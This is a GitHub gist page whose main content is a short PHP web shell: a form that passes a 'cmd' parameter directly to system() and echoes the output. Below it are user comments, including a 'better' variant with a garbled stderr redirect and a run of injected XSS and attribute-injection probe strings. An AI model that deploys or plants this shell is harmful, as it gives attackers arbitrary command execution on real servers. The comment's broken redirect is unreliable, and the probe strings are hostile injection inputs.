Last active
July 17, 2025 07:43
-
Star
(208)
You must be signed in to star a gist -
Fork
(58)
You must be signed in to fork a gist
-
-
Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { | |
| system($_GET['cmd'] . ' 2>&1'); | |
| } | |
| ?> | |
| </pre> | |
| </body> | |
| </html> |
You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.
Updated, thank you!
Nice.....
Thank you :) 👍
thanks
better:
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2&<1');
}
Adding 2&<1 you can see the error output.
'"></script>
GpZ9xu
'" rNnTRbt="roannATTR" x=yveepoB
rNnTRbt=1 x=d'">
05CrPC
rNnTRbt=1 x=d'">
AwKDWl
rNnTRbt=1 x=d'">
R9FxT5
rNnTRbt=1 x=d'">
PhtMv5
rNnTRbt=1 x=d'">
ro5B1T
rNnTRbt=1 x=d'">
YtzE5f
rNnTRbt=1 x=d'">
mlhKvP
rNnTRbt=1 x=d'">
ZcG29w
rNnTRbt=1 x=d'">
ptZkN2
rNnTRbt=1 x=d'">
Z1Eaq1
rNnTRbt=1 x=d'">
12ek3R
rNnTRbt=1 x=d'">
rggXyf
rNnTRbt=1 x=d'">
YT57dz
rNnTRbt=1 x=d'">
nZhHWE
rNnTRbt=1 x=d'">
m3fefe
rNnTRbt=1 x=d'">
rJQOpi
rNnTRbt=1 x=d'">
XfzUzq
rNnTRbt=1 x=d'">
lGCJUd
rNnTRbt=1 x=d'">
MWDi0j
rNnTRbt=1 x=d'">
JjgH81
rNnTRbt=1 x=d'">
qkkYo7
rNnTRbt=1 x=d'">
b6P304
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.